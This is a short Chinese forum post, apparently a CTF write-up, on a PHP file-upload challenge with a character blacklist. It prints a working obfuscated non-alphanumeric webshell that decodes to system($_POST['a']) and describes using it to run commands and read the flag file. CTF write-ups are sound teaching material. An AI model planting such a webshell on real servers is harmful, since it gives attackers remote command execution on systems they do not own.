[Writeup] getshell writeup

[复制链接]
查看8909 | 回复0 | 2019-6-7 10:31:14 | 显示全部楼层 |阅读模式
参考连接https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ //这里面的$_FILES["file"]["tmp_name"]的意思是获取随机文件名,这一段的意思是打开(文件名)
    $data=substr($contents,5); //截断临时文件从第五为开始截断
    foreach ($black_char as $b) { //foreach是数组循环,这里面的$b就是数组里面的每个内容
        if (stripos($data, $b) !== false){ //如果waf在就会报错,而这里我们不知道waf是撒直接上传一个无字符上去
            die("illegal char");
        }
    }     
}
这道题的考点就是无字符的shell
上传的无字符webshell
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
这个翻译过来就是
system($_POST['a']);
你直接post一个a= ../../../
就会看见一个flag文件
cat ../../../falg文件 即可
最后答案SUCTF{fake_flag_web_b}

评分

参与人数 1银两 +2 收起 理由
Harry + 2

查看全部评分

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

2

主题

3

帖子

18

积分

初入江湖

Rank: 2

积分
18